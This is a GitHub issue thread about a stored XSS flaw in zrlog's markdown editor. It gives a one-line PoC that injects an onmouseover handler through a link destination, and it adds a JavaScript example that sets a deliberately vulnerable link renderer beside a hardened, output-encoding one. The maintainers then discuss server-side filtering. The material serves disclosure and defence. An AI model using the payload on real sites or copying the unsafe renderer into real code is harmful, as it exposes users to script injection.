There is a stored XSS in the file upload area #39

Open
3lse opened this Issue Sep 18, 2018 · 4 comments

3lse commented Sep 18, 2018

After the file is uploaded correctly, "[abc](/zrlog/attached/file/20180918/20180918000718_50.jpg "abc")" will be displayed in the edit box. Combined with the page display, the XSS purpose is achieved by modifying the displayed content.
PoC
[click me](aa"onmouseover="alert(1)"s= "click me")

The page is displayed as "<a href="aa" onmouseover="alert(1)" s="title=" click="" me="me">click me</a>"
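The PoC above works because the link destination is copied into the `href` attribute without any encoding, so a double quote inside it closes the attribute and everything after it becomes new attributes on the `<a>` tag. The following is an added example, not code from zrlog or from the marked library: a minimal `[text](dest "title")` renderer written two ways, a vulnerable one that concatenates strings the way the reported output implies, and a hardened one that rejects destinations containing characters a URL should never carry raw, allows only `http`, `https` and `mailto` schemes for absolute URLs, and HTML-encodes every attribute value and the link text. Function names, the regex, the scheme allowlist and the sample inputs are all assumptions made for this illustration.

```javascript
// Added example, not zrlog's or marked's code. Names, the link regex and the
// scheme allowlist below are assumptions made for this illustration.

// Parse the [text](dest "title") form used in the PoC. The destination is
// matched lazily and the title is the optional trailing quoted string, which
// mirrors the split the reported output implies: href came from
// `aa"onmouseover="alert(1)"s=` and title from `click me`.
const LINK_RE = /^\[([^\]]*)\]\(\s*(.*?)(?:\s+"([^"]*)")?\s*\)$/;

function parseLink(markdown) {
  const m = LINK_RE.exec(markdown.trim());
  if (!m) return null;
  return { text: m[1], href: m[2], title: m[3] || "" };
}

// Vulnerable renderer: attribute values are inserted verbatim. A `"` inside
// the destination terminates href and the remainder becomes extra attributes.
function renderLinkUnsafe({ text, href, title }) {
  let out = '<a href="' + href + '"';
  if (title) out += ' title="' + title + '"';
  return out + '>' + text + '</a>';
}

// Output encoding for HTML text and double-quoted attribute values.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Schemes a link in user content may use (assumption; relative paths such as
// the uploaded-file path in the issue carry no scheme and are allowed).
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

// Returns the destination if it is acceptable, otherwise null.
function safeHref(href) {
  // Whitespace, quotes and angle brackets never belong raw in a URL; their
  // presence means someone is trying to break out of the attribute.
  if (/[\s"'<>]/.test(href)) return null;
  const scheme = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(href);
  if (scheme && !SAFE_SCHEMES.has(scheme[1].toLowerCase())) return null; // e.g. javascript:
  return href;
}

// Hardened renderer: validate the destination, encode every value.
function renderLinkSafe({ text, href, title }) {
  const url = safeHref(href);
  if (url === null) {
    // Unusable destination: emit the text only, never a half-trusted link.
    return escapeHtml(text);
  }
  let out = '<a href="' + escapeHtml(url) + '"';
  if (title) out += ' title="' + escapeHtml(title) + '"';
  return out + '>' + escapeHtml(text) + '</a>';
}

// Constructed inputs: the PoC from the issue and a legitimate upload link.
const POC = '[click me](aa"onmouseover="alert(1)"s= "click me")';
const UPLOAD = '[abc](/zrlog/attached/file/20180918/20180918000718_50.jpg "abc")';

console.log('unsafe:', renderLinkUnsafe(parseLink(POC)));
console.log('safe:  ', renderLinkSafe(parseLink(POC)));
console.log('upload:', renderLinkSafe(parseLink(UPLOAD)));
```

The vulnerable renderer turns the PoC into `<a href="aa"onmouseover="alert(1)"s=" title="click me">click me</a>`, which a browser parses into an `href`, an `onmouseover` handler and some junk attributes, matching what the reporter saw. The hardened renderer refuses that destination and prints plain `click me`, while the real upload link renders unchanged. The same validation should also run on the server before the markdown is stored, so the database never holds a payload that a different or older renderer might later emit unencoded.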

94fzb commented Sep 19, 2018

@3lse The editor uses the marked lib as its markdown parsing lib.
[screenshot]

And what do you think is a reasonable way?


3lse commented Sep 19, 2018

@94fzb
There may be problems with the closing of the HTML, but this does not affect the generation of the XSS.
e.g.
[screenshot]


3lse commented Sep 19, 2018

@94fzb You need to filter the acquired data on the server before saving it to the database.


94fzb commented Sep 19, 2018

@3lse Thanks, I will try using jsoup to filter unsafe tags sometime.
